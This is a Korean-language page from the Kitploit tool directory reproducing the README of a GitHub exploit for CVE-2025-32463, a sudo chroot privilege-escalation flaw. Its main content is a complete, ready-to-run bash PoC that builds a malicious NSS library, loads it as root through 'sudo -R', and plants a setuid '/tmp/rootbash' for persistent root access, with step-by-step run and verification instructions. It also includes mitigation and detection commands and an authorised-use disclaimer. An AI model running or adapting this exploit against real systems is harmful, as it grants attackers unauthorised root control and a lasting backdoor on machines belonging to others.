Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-32463 — sudo chroot 설계 결함을 대상으로 하는 CVE-2025-32463에 대한 로컬 권한 상승 익스플로잇입니다. 영향을 받는 sudo 버전 1.9.14-1.9.17에 대한 PoC 스크립트, 기술 분석 및 완화 지침을 제공합니다. | Kitploit
도구/GitHubGitHub/kaiht-ladiant/cve-2025-32463
Privilege EscalationVulnerability AnalysisExploitationPenetration TestingLearning & EducationBinary Exploitation
GitHubkaiht-ladiant/cve-2025-32463

CVE-2025-32463

sudo chroot 설계 결함을 대상으로 하는 CVE-2025-32463에 대한 로컬 권한 상승 익스플로잇입니다. 영향을 받는 sudo 버전 1.9.14-1.9.17에 대한 PoC 스크립트, 기술 분석 및 완화 지침을 제공합니다.

저장소 보기
211년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2025-32463 - Sudo Chroot 권한 상승 익스플로잇

개요

CVE-2025-32463은 sudo 1.9.14부터 1.9.17까지의 버전에서 발생하는 심각한 로컬 권한 상승 취약점입니다. 이 취약점은 chroot 옵션 처리 로직의 설계 결함을 악용하여 sudo 권한을 가진 공격자가 루트 액세스로 권한을 상승할 수 있도록 합니다.

취약점 세부 정보

  • CVE ID: CVE-2025-32463
  • 영향 받는 버전: sudo 1.9.14 - 1.9.17
  • 취약점 유형: 로컬 권한 상승(LPE)
  • 심각도: 치명적
  • 패치 버전: sudo 1.9.17p1 이상

기술 설명

이 취약점은 sudo의 보안 검증 프로세스의 타이밍 문제로 인해 발생합니다. pivot_root 함수가 보안 정책 검증 전에 실행되어, 공격자가 sudo가 인증 및 권한 부여에 사용하는 파일 시스템 환경을 조작할 수 있습니다.

공격 흐름

  1. 환경 조작: 공격자는 악성 nsswitch.conf를 포함한 제어된 chroot 환경을 생성합니다.
  2. 라이브러리 주입: 악성 NSS(이름 서비스 스위치) 라이브러리가 제어된 환경에 배치됩니다.
  3. 권한 상승: sudo가 악성 라이브러리를 루트 권한으로 로드하고 실행합니다.
  4. 루트 액세스: 공격자는 완전한 루트 셸 액세스를 얻습니다.

영향을 받는 함수

  • pivot_root: 프로세스에서 너무 일찍 실행됨
  • set_cmnd_path: 조작된 환경에서 작동함
  • command_matches: 환경 조작으로 인해 보안 검사가 우회됨

사전 요구 사항

이 익스플로잇을 사용하기 전에 다음 조건이 충족되었는지 확인하십시오:

  • 대상 시스템이 sudo 1.9.14 - 1.9.17을 실행 중
  • 현재 사용자에게 sudo 권한이 있음
  • sudoers 구성이 chroot 작업을 허용함
  • 대상 시스템에 gcc 컴파일러를 사용할 수 있음
  • 임시 디렉터리(예: /tmp)에 대한 쓰기 액세스 권한이 있음

사용법

빠른 시작

  1. 이 저장소를 클론합니다:
root@kitploit:~
git clone https://github.com/KaiHT-Ladiant/CVE-2025-32463
cd CVE-2025-32463
  1. 스크립트를 실행 가능하게 만듭니다:
root@kitploit:~
chmod +x cve-2025-32463.sh
  1. 익스플로잇을 실행합니다:
root@kitploit:~
./cve-2025-32463.sh

수동 확인

대상 시스템이 취약한지 확인하십시오:

root@kitploit:~
# Check sudo version
sudo --version

# Check sudo privileges
sudo -l

# Look for chroot-related permissions
sudo -l | grep chroot

익스플로잇 코드

주요 익스플로잇 스크립트(cve-2025-32463.sh):

root@kitploit:~
#!/bin/bash
# CVE-2025-32463 PoC - Sudo Chroot Privilege Escalation
# Based on research by Rich Mirch @ Stratascale Cyber Research Unit

STAGE=$(mktemp -d /tmp/pentest.stage.XXXXXX)
cd ${STAGE?} || exit 1

cat > pentester.c<<'CEOF'
#include <stdlib.h>
#include <unistd.h>

void woot(void) {
  setreuid(0,0);
  setregid(0,0);
  chdir("/");
  system("id > /tmp/pwned_proof.txt");
  system("cp /bin/bash /tmp/rootbash && chmod +s /tmp/rootbash");
  execl("/bin/bash", "/bin/bash", NULL);
}
CEOF

mkdir -p pentest/etc libnss_
echo "passwd: /pentester" > pentest/etc/nsswitch.conf
cp /etc/group pentest/etc
gcc -shared -fPIC -Wl,-init,woot -o libnss_/pentester.so.2 pentester.c

echo "[*] Exploiting CVE-2025-32463..."
echo "[*] Attempting privilege escalation..."
sudo -R pentest pentest

# Cleanup
rm -rf ${STAGE?}

확인

성공적인 익스플로잇 후 루트 액세스를 확인하십시오:

root@kitploit:~
# Check current privileges
whoami

# Check proof file
cat /tmp/pwned_proof.txt

# Use setuid bash for persistent root access
/tmp/rootbash -p

완화

즉시 조치

  1. sudo를 1.9.17p1 이상으로 업데이트하십시오:

    root@kitploit:~
    # Ubuntu/Debian
    sudo apt update && sudo apt upgrade sudo
    
    # CentOS/RHEL
    sudo yum update sudo
    
    # or
    sudo dnf update sudo
    
  2. sudoers에서 chroot 지시문을 제거하십시오 (임시 해결 방법):

    root@kitploit:~
    # Backup current configuration
    sudo cp /etc/sudoers /etc/sudoers.backup
    
    # Remove chroot-related entries
    sudo sed -i '/chroot/d' /etc/sudoers
    
    # Verify syntax
    sudo visudo -c
    

탐지

익스플로잇 시도를 모니터링하십시오:

root@kitploit:~
# Check for suspicious temporary directories
find /tmp -name "*.stage.*" -type d

# Monitor sudo logs
tail -f /var/log/auth.log | grep sudo

# Look for NSS library compilation
find /tmp -name "libnss_*.so*" -type f

기술 세부 사항

근본 원인 분석

이 취약점은 sudo 실행 흐름의 설계 결함에서 비롯됩니다:

  1. 정상적인 예상 흐름:

    • 사용자 입력 구문 분석
    • sudoers 정책 검증
    • 환경 설정 (chroot 포함)
    • 명령 실행
  2. 실제 취약한 흐름:

    • 사용자 입력 구문 분석
    • chroot(pivot_root) 실행 - 문제 발생 지점
    • sudoers 정책 검증 (조작된 환경에서)
    • 명령 실행

NSS 라이브러리 악용

익스플로잇은 이름 서비스 스위치(NSS) 시스템을 활용합니다:

  1. sudo는 사용자 인증을 위해 /etc/nsswitch.conf를 읽습니다.
  2. chroot 환경에서 공격자는 이 파일을 제어합니다.
  3. 악성 NSS 라이브러리가 루트 권한으로 로드됩니다.
  4. 라이브러리 생성자가 루트로 임의 코드를 실행합니다.

테스트 환경

이 익스플로잇은 다음에서 테스트되었습니다:

  • Ubuntu 20.04/22.04 with sudo 1.9.15
  • Debian 11/12 with sudo 1.9.14-1.9.17
  • CentOS 8/9 with affected sudo versions
  • Docker containers with vulnerable sudo installations

참고 자료

  • Official sudo security advisory
  • Original research by Rich Mirch
  • Sudo source code analysis

고지 사항

⚠️ 중요 고지 ⚠️

이 도구는 교육 및 승인된 테스트 목적으로만 제공됩니다.

  • 자신이 소유하거나 명시적 테스트 권한이 있는 시스템에서만 사용하십시오.
  • 이 익스플로잇의 무단 사용은 불법이며 비윤리적입니다.
  • 저자는 어떠한 오용이나 손해에 대해서도 책임을 지지 않습니다.
  • 보안 테스트를 수행하기 전에 항상 적절한 승인을 받았는지 확인하십시오.

기여하기

기여를 환영합니다! 다음을 따라 주십시오:

  1. 저장소를 포크(Fork)하십시오.
  2. 기능 브랜치를 생성하십시오.
  3. 상세한 설명과 함께 풀 리퀘스트(Pull Request)를 제출하십시오.

라이선스

이 프로젝트는 MIT 라이선스에 따라 라이선스가 부여됩니다. 자세한 내용은 LICENSE 파일을 참조하십시오.

변경 로그

v1.0.0

  • 최초 릴리스
  • 기본 익스플로잇 기능
  • 포괄적인 문서

참고: 이 취약점은 중요한 시스템 구성 요소에 영향을 미칩니다. 책임감 있게 사용하고 모든 테스트가 승인되었는지 확인하십시오.

도구 다운로드